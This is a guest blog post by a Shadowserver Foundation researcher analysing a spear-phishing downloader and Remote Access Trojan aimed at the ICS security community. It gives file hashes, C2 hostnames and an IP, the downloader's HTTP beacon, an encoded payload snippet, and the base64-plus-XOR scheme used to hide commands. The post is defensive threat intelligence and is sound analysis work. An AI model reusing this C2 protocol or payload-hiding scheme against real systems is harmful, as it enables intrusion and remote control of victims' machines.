The following is guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security .
Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip
Size: 1886505
MD5: 820B1CD69828983C089370BDC3CF5870
This archive contained an executable with the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe
Size: 2192363
MD5: C6B95B178188B8C35D14BED40520E685
When executed in a lab environment this executable installed a Trojan downloader with the following properties:
File: spoolsvr.exe
Size: 73728
MD5: 5FF3269FACA4A67D1A4C537154AAAD4B
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe
As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:
GET /logo.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: hint.happyforever.com
Connection: Keep-Alive
The logo.html contained encoded instruction and payload. A snippet of the response is as follows:
<html><head>Ji01LC4tIyZ4eTEuJycyeHByeQ==</head><title>NiMsJSoubCc6Jw==</title><body>DxjSQkFCQkJGQkJCvb1CQvpCQkJCQkJCAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCmkJCQkxd+ExC9kuPY/pDDo9jFiorMWIyMC0lMCMvYiEjLCwtNmIgJ2IwNyxiKyxiBg0RYi8t
JidsT09IZkJCQkJCQkK+wXCi+qAe8fqgHvH6oB7xebwQ8e+gHvHMhhTxlqAe8ZW/FfH4oB7xeahD
8f2gHvH6oB/xqaAe8cyGFfH0oB7xPaYY8fugHvEQKyEq+qAe8UJCQkJCQkJCEgdCQg5DRkKGWM8N
QkJCQkJCQkKiQk1DSUNEQkLCQ0JCUkNCQkJCQtSoQkJCUkJCQtJDQkJCAkJCUkJCQlJCQkZCQkJC
The above text can be decoded via the following two-step process. First, decode with the standard base64 alphabet and then apply a single byte XOR key of 0x42. The <head> tag will decode to:
<head>download:;sleep:20;</head>
These commands instruct the spoolsvr.exe downloader to retrieve and decode a secondary payload contained in the <body> tag executable. The <title> tag will decode to:
<title>tanghl.exe</title>
This command instructs the spoolsvr.exe downloader to save the secondary payload decoded from the <body> tag onto the victim machine as tanghl.exe.
The tanghl.exe file is a Remote Access Trojan that gives the attacker full control of the victim machine. This tanghl.exe file had the following properties:
File: tanghl.exe
Size: 167936
MD5: 9B6692295FADF24B512D5F63E4F74D15
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\tanghl.exe
This RAT attempts to connect to another command and control server at 1.234.1.68 over port 80. Communications between the RAT and the control server are encoded via base64 and a single byte XOR key of 0x6b.
The above patterns of attack are very similar to attacks carried by the actors responsible for the Shady RAT campaign documented by McAfee. Similarities include the use of encoded commands hidden in otherwise normal looking webpages as well as an overlap in the command and control infrastructure used in this attack with previous Shady RAT attacks.
Ned Moran is a member of the Shadowserver Foundation (www.shadowserver.org) where he spends his time researching targeted attacks. He can be reached at ned /at/ shadowserver /dot/ org.
Image by Razza Mathadsa